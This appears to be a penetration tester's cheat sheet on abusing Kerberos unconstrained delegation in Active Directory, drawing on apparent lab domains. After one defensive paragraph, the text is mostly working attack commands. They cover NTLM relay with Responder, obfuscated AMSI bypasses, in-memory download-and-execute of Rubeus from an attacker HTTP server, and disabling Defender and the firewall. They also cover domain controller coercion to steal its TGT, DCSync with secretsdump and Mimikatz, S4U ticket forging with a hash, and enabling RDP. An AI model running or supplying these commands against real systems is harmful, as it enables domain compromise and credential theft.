Unconstrained delegation Enum

Unconstrained delegation is a configuration that attackers can potentially use to impersonate a user or service account and gain access to sensitive resources in an organization's network. To mitigate the risks associated with unconstrained delegation, organizations should take steps to fully understand such configurations, implement best practices regarding privilege, apply effective remediation steps, and replace unconstrained delegation with resource-based delegation wherever possible.

• One way to find unconstrained delegation is to look in bloodhound

MATCH (c {unconstraineddelegation:true}) return c

If you want to search for unconstrained delegation system (out of domain controller) :

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2

• With a socks connection you can only use smbexec or atexec. Neither wmiexec, psexec nor dcomexec will work. (explainations here : https://github.com/SecureAuthCorp/impacket/issues/412 )

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Run smbeexe to get interactive shell

sudo proxychains smbexec.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22 -shell-type powershell

Prepare our server containing Rubeus.exe and our AMSI bypass.

python3 -m http.server 8080

On the shell session bypass AMSI :

#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )



$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX

#check status of Defender

Get-MpComputerStatus

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
netsh advfirewall set allprofiles state off


#Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing


#List AppLocker rules
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections

Now launch Rubeus in memory with execute assembly.
First we will list the available tickets :

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

And now force a coerce of the DC NYC to the DC Bronx.

python3 coercer.py -u claudio.ortiz -d north.newyork.local -p bayboy -t NYC.Newyork.local -l Bronx

We look on the triage again :

[Rubeus.Program]::MainString("triage")

And now the tgt of NYC is present

To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)

[Rubeus.Program]::MainString("dump /user:NYC$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller

Let’s continue on linux to pass the ticket and launch dcsync with secretdump :

copy the ticket without space and return line (in vim i do : :%s/\s*\n\s*//g) convert the ticket to ccache use the kerberos ticket and launch secretdump

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC

#Abusing FullControl using PowerView:
import-module .\powerview.ps1
Get-DomainComputer -TrustedToAuth


Triage All Current Tickets (If Elevated List all Users)
.\Rubeus.exe triage
s
List all Current Tickets in Details (If Elevated List all Users)
\Rubeus.exe klist



. .\Invoke-Mimikatz.ps1
invoke-mimikatz
aa81bb97a48748ad89541137bf78001f

#ask dc for a tgt for the student server
#Download kekeo:
https://github.com/gentilkiwi/kekeo/releases
kekeo.exe
tgt::ask /user:student$ /domain:pentesting.local /rc4:aa81bb97a48748ad89541137bf78001f

#ask dc for a tgs for the student server
tgs::s4u /tgt:TGT_student$@PENTESTING.LOCAL_krbtgt~pentesting.local@PENTESTING.LOCAL.kirbi /user:Administrator@pentesting.local /service:time/ad.pentesting.local|ldap/ad.pentesting.local

#use the tgs and inject it
. ..\..\invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@pentesting.local@PENTESTING.LOCAL_student$@PENTESTING.LOCAL.kirbi"'

#Dcsync to perform a goldent ticket attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:pentesting\krbtgt"'

#Look at this if it does not work:
https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203

#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1